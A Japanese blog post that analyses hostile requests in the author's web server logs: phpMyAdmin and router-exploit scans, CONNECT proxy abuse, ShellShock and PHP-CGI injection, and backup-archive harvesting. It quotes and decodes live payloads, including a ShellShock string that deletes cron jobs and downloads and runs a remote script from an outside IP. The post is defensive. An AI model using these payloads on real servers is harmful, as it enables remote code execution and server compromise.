WebServerに現れた怪しいアクセスの内容を分析
2017/04/06
Webサーバを稼働させ、WWW上にWebページを公開していると、明らかにおかしいアクセスがこんにちはするのは皆さんご存知かと思われます。
とは言え、それらが何を企み、どこをどうしようとしているのかが分からないのは少々不安です。
いくつかパターンを抽出して調べてみました。
スポンサーリンク
おかしな連中
残念ながら世の中には悪い連中が沢山居るみたいで……
いくつかの悪い奴らをご紹介しようと思います。
古いPHPMyAdminを狙う奴
参考:phpMyAdminを狙った攻撃観察 - ろば電子が詰まっている
209.126.107.196 - - [23/Mar/2015:14:18:46 +0900] "GET /phph/php/ph.php HTTP/1.1" 404 460 "-" "-"
209.126.107.196 - - [23/Mar/2015:14:18:46 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 486 "-" "-"
209.126.107.196 - - [23/Mar/2015:14:18:46 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 472 "-" "-"
209.126.107.196 - - [23/Mar/2015:14:18:47 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
良い事なんだか悪い事なんだか、ちょっぴり有名みたいで……
具体的な動き方は以下の通り
- 最初にランダムにアクセスしようと試みる(今回の場合は/phph/php/ph.php)
- 次に/phpMyAdmin/scripts/setup.phpにアクセスしようとします(存在をスキャン)
- その後、考えられる名前候補(pmaとmyadmin)で同じ事をします
こいつ、毎日凄まじい回数やってきやがります。
亜種(?)も存在するらしく、なんだか妙なUserAgentを送ってきたりします。
PHPMyAdminと言うのはMySQLと言うデータべースをブラウザから管理出来るツールです。
PHPと言う名前だけあって、PHPで出来ています、この「scripts/setup.php」にアクセスしようとしてきます。
PHPMyAdmin自体が他人に見せる物では無いのですが「scripts/setup.php」は古いMyAdminにしか無く現在(4.X系)にはこのファイル自体がありません。
つまり、このアタックで被害を受けるのは古いMyAdminを用いている不用心なサーバのみです。
ルータの脆弱性を狙うボット
参考:ハニーポット観察記録(21) at www.morihi-soc.net
こいつは単体(?)でやってきます。
- 5.32.71.10 "GET /tmUnblock.cgi HTTP/1.1" 400
さて、当たり前ですがtmUnblock.cgiなんてありません。
無いったらないのですが、HTTP/1.1なのにHostヘッダが無いらしく、要求としては破損しているが為に「HTTP:400 BadRequest(正しく無い要求)」を応答しています。
このBotはLinksysと言うメーカの一部シリーズに報告された脆弱性を狙う様です。
Linksys(リンクシス)はシスコシステムズの傘下にあるメーカです。
古い脆弱性ですし、そもそもこのサーバはルータじゃないし無問題
Webサーバをプロキシとして踏み台にし、スパム配信を狙うボット
参考:はかいおうこうむてん - CONNECTメソッドに200?
参考:Denied Access と表示され、接続を拒否される
これがなかなか難しかったです
- 111.251.50.149 "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 200 1155
身に覚えもないtw(台湾)ドメインに、如何にもメールって感じのアドレスで、しかも、ポート25(SMTP:メール)へのCONNECTの送信
どこからどう見ても怪しい上にApacheが、成功(HTTP200)を返してしまっています。
どうやら、スパム屋さんがWeb鯖を踏み台にして、スパム配信を試みている様です。
さて、成功(200)を返してしまっていますが、CONNECTは、Apacheでプロキシ関連のモジュールを読み込まないと利用出来ないはずです。
もちろん、そんな物読み込んだ覚えは無い。
ならば何故に200???と、思い、調べてみると
ApacheのドキュメントルートにCGI(PerlやPHP)を設置していると、プロキシ中継成功の有無に問わずHTTP200を返す(と、言うより失敗してもトップページを表示するから200に見える)らしいです。
確かにサーバールートはindex.phpです。念のため、モジュールを確認しましたが、もちろんプロキシなんてありません
良くわからないので、参考サイトと同じようにテストしてみました。
LAN内からtelnetコマンドを使います。
(<-はEnter)
$ telnet 192.168.X.X 80<-
Trying 192.168.X.X
Connected to 192.168.X.X
Escape character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 200 OK
~~割愛~~
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML lang="ja">
<head>
<title>トップページ</title>
~~略~~
あらら?メールポートへのアクセスを要求してるのに成功として帰ってきたのは自サイトのトップページではありませんか
丁度、手元にテザリングが使えるiPhoneがあるので携帯回線を用いて外部から同じことをしてみましょう
$ telnet jyn.jp 80<-
Trying jyn.jp
Connected to サーバのIP
Escap character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 200 OK
~~割愛~~
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML lang="ja">
<head>
<title>トップページ</title>
~~略~~
外部から発行したtelnetでも同じ結果が返ってきました。
つまりそう言う仕様、もしくはバグの一種でしょう。
試しに、index.phpをindex.htmlに変更して試してみましょう。
まずはローカル環境から
$ telnet 192.168.X.X 80<-
Trying 192.168.X.X
Connected to 192.168.X.X
Escape character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 405 Method Not Allowed
~~~略~~~
次にテザリングで外部から
$ telnet jyn.jp 80<-
Trying jyn.jp
Connected to サーバのIP
Escap character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 405 Method Not Allowed
問題なさそうですね、HTTP200でしたが、心配ありませんでした。
(該当のアクセスがあった方は念のため確認してみて下さい)
ちなみに、亜種も居ます。
- CONNECT www.alipay.com:443 HTTP/1.1" 301 411
日本のアニメを求めてクラックを試みる外人オタク
参考:/epgrec/へのWebアクセスは何がしたいのかを探る - ろば電子が詰まっている
- 195.154.11.217 "GET /epgrec/systemSetting.php HTTP/1.1" 404 1363 "Python-urllib/2.7"
- 195.154.11.217 "GET /animeprogram/index.php HTTP/1.1" 404 1363 "Python-urllib/2.7"
Pythonでurllib(URLを扱うライブラリだと思われ)を用いて実行して居ますね。
狙ったファイルは……epgrec?のシステム設定?、epgrecってなんぞや?
調べてみた所、EPGrecはLinux向けテレビ番組録画予約システムで、なんでもWeb経由でテレビ番組を録画出来るんだとか?
これの脆弱性を狙った攻撃のようです。
でもこれ、日本発のソフトで、利用しているユーザもほぼ日本人のみ、しかもLinux向け
普通に考えて、マイナー過ぎるシステムをピンポイントで狙うとは何事か?
と、思いますが、どうやら脆弱性を狙って攻撃するらしいです。攻撃するということは、攻撃する価値があるという事。
何に価値を見出しているのかというのは二行目のログが語っています。
ログの2行目「/animeprogram/index.php」太字の所、落ち着いて読んでみて下さい。
「アニメプログラム」と読み取れますね。指定しているディレクトリ名が「アニメプログラム」になっている。
予想にしか過ぎないけど、この/animeprogram/には録画されたアニメが保存されるのだと思います。
外人の所謂ダークサイドオタクが日本のアニメ番組を求めて実行しているらしいです。
日本人として、それくらいアニメが人気であるという事は嬉しいのですが……なんせやり方が……
大抵こういう奴は不正アクセス+違法アップロードなんていう救いようのないバk……ですし、自分で見るためでなく、アップロードして崇められたり広告費を得るためです。
残念ながらこのサーバはWebサーバ、何をどう間違えても録画用サーバなんかじゃありません。
残念だけど、アニメなんてありませんよ(私はどっちかと言うとゲーム寄りですしね)
BashのShellShockを狙うアタック
31.184.194.114 - - [05/Mar/2015:08:16:38 +0900] "GET HTTP/1.1 HTTP/1.1" 400 392 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:38 +0900] "GET /phppath/cgi_wrapper HTTP/1.1" 301 468 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:39 +0900] "GET /phppath/php HTTP/1.1" 301 452 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:40 +0900] "GET /fcgi-bin/php5.fcgi HTTP/1.1" 301 466 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:40 +0900] "GET /fcgi-bin/php HTTP/1.1" 301 454 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:41 +0900] "GET /cgi-bin/php5 HTTP/1.1" 301 454 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:41 +0900] "GET /cgi-bin/test-cgi HTTP/1.1" 301 462 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:42 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 301 462 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:42 +0900] "GET /cgi-mod/php5.cgi HTTP/1.1" 301 462 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:43 +0900] "GET /xampp/cgi.cgi HTTP/1.1" 301 456 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:44 +0900] "GET /cgi-bin/up.cgi HTTP/1.1" 301 458 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:44 +0900] "GET /fcgi-php/php HTTP/1.1" 301 454 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:45 +0900] "GET /cgi-bin/cgi.cgi HTTP/1.1" 301 460 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
BashのShellShockを狙った攻撃ですね。
ShellShockで実行しようとしているのは以下の通り。
() { :;};
/usr/bin/perl -e '
print "Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";
system("
crontab -r;
killall -9 php perl;
cd /tmp/ ;
mkdir gnu-bash-max-races ;
cd /tmp/gnu-bash-max-races ;
wget http://64.32.12.152/gnu-bash-max-race ;
lwp-download http://64.32.12.152/gnu-bash-max-race ;
fetch http://64.32.12.152/gnu-bash-max-race ;
curl -O http://64.32.12.152/gnu-bash-max-race ;
perl gnu-bash-max-race;
cd /tmp/;
rm -rf max*
");
'
分かるだけ解説していきましょう。
() { :;};
ShellShockのそれですね。
/usr/bin/perl -e
これでPerlを呼び出し
print "Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";
これでプレーンテキストを偽り(\r\nはいわゆる改行です。)
system()
これでシェルコマンドを実行しようとしています。
内容としては
crontab -r; <- cronを全て削除
killall -9 php perl; <- PHPとPerlのプロセスを全滅させる
cd /tmp/ ; <- /tmp/に移動
mkdir gnu-bash-max-races ; <- gnu-bash-max-races/ディレクトリを作成
cd /tmp/gnu-bash-max-races ; <- gnu-bash-max-races/ディレクトリに移動
wget http://64.32.12.152/gnu-bash-max-race ; <- wgetでダウンロード
lwp-download http://64.32.12.152/gnu-bash-max-race ; <- LWPでダウンロード
fetch http://64.32.12.152/gnu-bash-max-race ; <- fetchでダウンロード
curl -O http://64.32.12.152/gnu-bash-max-race ; <- curlでダウンロード
perl gnu-bash-max-race; <- ダウンロードしたものを実行する
cd /tmp/; <- /tmp/に戻る
rm -rf max* <- ダウンロードしたものを消す
つまり、何が何でも64.32.12.152からgnu-bash-max-racesをダウンロードしたい模様ですね。
どんな面白い物が入ってるのか気になったのでwgetをしてみましたが、既にそこにお宝はありませんでした……
が、当サーバはとっくの昔にShellShockは対策済みのため、無問題です。
URLエンコードでPHPをぶち込んでくる奴
198.154.63.131 - - [26/Feb/2015:05:01:58 +0900] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 1755 "-" "-"
……嫌がらせでしょうかね?
194.250.119.83 - - [08/Feb/2015:19:11:52 +0900] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 1584 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
URLエンコードされてますね、デコードしてみました
cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n
URLからのインクルードを有効にして、セーフモード切って……?
最後にinput(標準入力)から受け取った物を使おうとしている辺り、POSTで渡された本文にヤバい物が含まれていると予想
とは言え、これが効いちゃうサーバなんてない気がします、何年前の脆弱性だよコレ、って感じ。
アーカイブ泥棒
こんな奴も……
107.178.195.151 - - [28/Jun/2016:13:38:09 +0900] "HEAD /web.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.147 - - [28/Jun/2016:13:38:10 +0900] "HEAD /backup.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:10 +0900] "HEAD /backup.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:10 +0900] "HEAD /backup.sql HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.151 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.sql HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.151 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.147 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.tar HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:18 +0900] "HEAD /public.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:18 +0900] "HEAD /public.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:19 +0900] "HEAD /public.rar HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:19 +0900] "HEAD /public_html.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.151 - - [28/Jun/2016:13:38:19 +0900] "HEAD /public_html.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
バックアップのアーカイブ狙いですね。
sqlも狙っている辺り、パスワードをレインボーテーブルで割りたいのか、もしくはこのブログの完全なるクローンを作成したいのだと思われます。
特筆すべき点はこれのUAが「AppEngine-Google」、すなわちGoogle AppEngineでこんにちはしている点です。(UAは自称なので、そう偽っているだけかもしれませんが)
短期間だけ高性能なサーバを借りて(もしくは無料枠を使って)超速で収集、終わったらインスタンスを破棄、みたいなスタンスですかね?(そうすれば安価で素早く大量に手に入れられますからね)
そもそもHTTPでアクセス出来る範囲にバックアップを置く奴居るの?
Webから見られる範囲にバックアップのアーカイブを置かないなんて至極当然の事です。
最後に
嫌な世の中ですねぇ……
今回紹介したのはほんの一例です、実際はもっと多彩な攻撃が沢山飛んできます。
殆どが無効なリクエストなので鯖側で拒否してしまうのですが、うっかり脆弱性を突かれる事も無きにしも非ずなのでセキュリティには気を付けて下さい(ShellShockとかああ言うのあるとヤバめ)